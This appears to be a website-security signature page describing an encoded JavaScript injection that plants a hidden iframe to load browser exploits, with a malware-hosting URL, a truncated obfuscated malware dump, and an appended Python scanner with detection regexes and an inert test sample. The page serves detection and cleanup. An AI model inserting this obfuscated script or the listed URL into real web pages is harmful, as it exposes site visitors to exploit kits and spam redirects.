SiteCheck Signatures

malware-entry-mwiframeenc1603

Description:

A hidden iframe was identified inside an encoded block of JavaScript. It loads content from remote web sites in an attempt to exploit specific browser vulnerabilities (from exploit packs). In some variations, the browser is redirected to blackhat SEO spam sites. It is also known as "Exploit:HTML/IframeRef.AA" or "Iframes" by some antivirus products.

 
Note that every PHP, HTML and JS file could get compromised by this malware.

 
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://jazzute.ru/count5.php
(and many other domains).

 

Malware dump (sample of malware):

<script>c=2;i=c-2;
if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=["-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i4..
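
Because any PHP, HTML or JS file can carry this injection, a cleanup usually starts by sweeping the whole web root for the structural traits visible in the sample above. The following is an added example, not SiteCheck's own signature or code; the trait names, regexes, the 20-number threshold and the two-trait cutoff are assumptions chosen for illustration, and the embedded sample is constructed and inert.

```python
import re
from pathlib import Path

# Traits visible in the truncated sample above; thresholds are assumptions.
TRAITS = {
    # parseInt("0123")===83 holds only where a leading 0 means octal.
    "octal_guard": re.compile(r'parseInt\(\s*["\']0\d+["\']\s*\)\s*={2,3}\s*\d+'),
    # Payload array is set up in a catch block after a deliberately failing
    # ".prototype.<name>" access on a string instance.
    "forced_exception": re.compile(r'try\s*\{[^{}]*\.prototype\.\w+\s*\}\s*catch'),
    # Quoted run of 20+ signed integers joined by one repeated letter.
    "number_blob": re.compile(r'["\']-?\d{1,3}([A-Za-z])(?:-?\d{1,3}\1){19,}'),
}
EXTENSIONS = {".php", ".html", ".htm", ".js"}


def scan_text(text):
    """Return the sorted names of the traits found in text."""
    return sorted(name for name, rx in TRAITS.items() if rx.search(text))


def scan_tree(root, min_traits=2):
    """Map each PHP/HTML/JS file under root to its traits when at least
    min_traits match; one trait alone is common in legitimate code."""
    hits = {}
    for path in Path(root).rglob("*"):
        if not (path.is_file() and path.suffix.lower() in EXTENSIONS):
            continue
        try:
            found = scan_text(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skip it rather than abort the sweep
        if len(found) >= min_traits:
            hits[str(path)] = found
    return hits


# Constructed, inert sample: same structure as the dump, harmless numbers.
SAMPLE = ('<script>if(parseInt("0123")===83)try{new String("asd").prototype.q}'
          'catch(e){f=["' + "i".join(str(n) for n in range(40)) + 'i"]}</script>')

if __name__ == "__main__":
    import sys
    for name, traits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(name, ",".join(traits))
```

Matches are leads for manual review, and a file that matches should be compared against a known-good copy before it is restored or edited.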